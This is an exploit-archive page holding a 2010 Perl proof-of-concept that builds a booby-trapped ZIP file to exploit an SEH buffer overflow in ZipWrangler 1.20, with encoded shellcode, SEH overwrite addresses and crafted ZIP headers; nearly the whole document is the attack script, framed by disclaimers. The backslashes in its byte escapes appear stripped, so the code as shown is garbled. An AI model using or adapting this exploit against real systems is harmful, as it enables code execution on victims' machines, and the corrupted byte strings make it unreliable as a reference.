ZipWrangler 1.20 (.zip) SEH 0day exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : ZipWrangler 1.20 (.zip) SEH 0day exploit
# Published : 2010-04-24
# Author : TecR0c and Sud0
# Previous Title : WM Downloader v3.0.0.9 Buffer Overflow (Meta)
# Next Title : EDraw Flowchart ActiveX Control 2.3 (.edd parsing) Remote Buffer Overflow PoC
#!/usr/bin/perl
# Title:                ZipWrangler 1.20 (.zip) SEH 0day exploit
# Author:               TecR0c & Sud0
# Date:                 April 24th, 2010
# Corelan Reference:    http://www.corelan.be:8800/advisories.php?id=CORELAN-10-031
# Download:             http://www.softpedia.com/get/Compression-tools/ZipWrangler.shtml
# Platform:             Windows XP sp3 En (VMWARE)
# Greetz to:            Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes.
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.  
# If you do, Corelan cannot be held responsible for any damages this may cause.

print "|-------------------------------------------------------------------|n";
print "|                         __               __                       |n";
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___   |n";
print "|  / ___/ __ / ___/ _ / / __ `/ __    / __/ _ / __ `/ __ `__   |n";
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / /  |n";
print "| ___/____/_/   ___/_/__,_/_/ /_/   __/___/__,_/_/ /_/ /_/   |n";
print "|                                                                   |n";
print "|                                       http://www.corelan.be:8800  |n";
print "|                                              security@corelan.be  |n";
print "|                                                                   |n";
print "|-------------------------------------------------[ EIP Hunters ]---|n";
print "  [+] ZipWrangler 1.2 (.zip) SEH exploitn";



my $ldf_header = "x50x4Bx03x04". # local signature
"x14x00". # version minimum needed to extract
"x00x00". #general purpose bit flag
"x00x00". #compression method
"xB7xAC". #file last modification time
"xCEx34". # file last modification date
"x00x00x00x00". #CRC32
"x00x00x00x00". #Compressed size
"x00x00x00x00" . #Uncompressed Size
"x48x10" .# filename length E4 0F
"x00x00"; #Extra filed length


my $cdf_header = "x50x4Bx01x02". #Signature
"x14x00".#version made by
"x14x00".#version needed to extract
"x00x00".#general purpose bit flag
"x00x00".#Compression method
"xB7xAC".#File last modification time
"xCEx34".#File last modification date
"x00x00x00x00". #CRC32
"x00x00x00x00".#Compressed Size
"x00x00x00x00".#Uncompressed Size#
"x48x10". # filename length
"x00x00". #Extra Field Length
"x00x00". #File comment length
"x00x00". #Disk number where File starts
"x01x00". #Internal File Attributes
"x24x00x00x00". #External File Attributes
"x00x00x00x00"; #Relative offset of local file header;

my $eofcdf_header = "x50x4Bx05x06". #End of central Directory Signature
"x00x00". #Number of this disk
"x00x00". #Disk where central directory starts
"x01x00". #Number of central directory records on this Disk
"x01x00". #Total Number of central directory records
"x76x10x00x00". #Size of central directory (bytes) (central directory header size + payload)
"x66x10x00x00". # Offset of start of central directory, relative to start archive  (lfh + payload)
"x00x00"; #Zip file Comment length;

#  mov edx, ds :[EAX] ---> the address 0x7FFDFD0C = 00000 in DS
#  so EDX=0000, next instruction TEST EDX,EDX  / Jz xxxxxx (will bypass the error due to mov ECX, ds:[edx])
#  the jump will take us to a retn (so we are out from handler routine) --> come back to execution
#  0x77E9025B [rpcrt4.dll] will overwrite EIP after being back from exception
#  bingo , after xEBx06 we are in our xcc
# shell = message box eax e

my $shell="PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8" .
"ABuJIn9JKmK9IT4tdl4tqzrmbpzUaIYcTNkpqfPlKD66lNkpvwlLKsvgx" .
"lKsNepNkEf4xpO4XPul3qIs1KaKOKQapLK2LgT14lKsuUlNkpTgurX6aZ" .
"JLK1ZwhLKCjepUQzKm3p7W9LKp4nkwqzNp1kOvQKpKLLlmTo0BTTJZahO4" .
"MuQKwxihqKOKOIoWKQlQ4Ux2UyNNkcjq4uQJKsVNk6lpKnkrzuL5QXkLKV" .
"dNkWqM8K9qT5tglE1XC82C8EyYDNi8eMY9RCXlNpN4NhlbryxMLKOKOKOl" .
"IqUfdOKQnN8YrPsMW7lddV2KXlKIoyoKOoycueXQxplPlEpkO3XP3VRfNu" .
"4qxpupscUcBK8qLutWzOyIvpVyoaEETMYO2pPMkoXY22mOLOwwlWTf2kXa" .
"NKOYokOSXPlpapnV83XQsbOT255P1kkoxaLQ4TGniKSBHQtShWPUpax0op" .
"iCD55PhpeqhRPbLUaJiNh2lEteYOykQdqKbSbQCv12rKOXP6QO0pPKOSeV" .
"h5ZA";

my $shellcode="A" x 2 . $shell . "A" x (4080-2-length($shell)) . "x0CxFDxFDx7F" . "x90" x 4 . "x5bx02xe9x77" . "x90" x 8 . "x83xC0x16xFFxE0"."xcc" x 59;
my $filename="wrangler.zip";

my $payload = $shellcode . ".txt";

print "Size : " . length($payload)."n";
print "Removing old $filename filen";
system("del $filename");
print "Creating new $filename filen";
open(FILE, ">$filename");

print FILE $ldf_header . $payload . $cdf_header . $payload . $eofcdf_header;
close(FILE);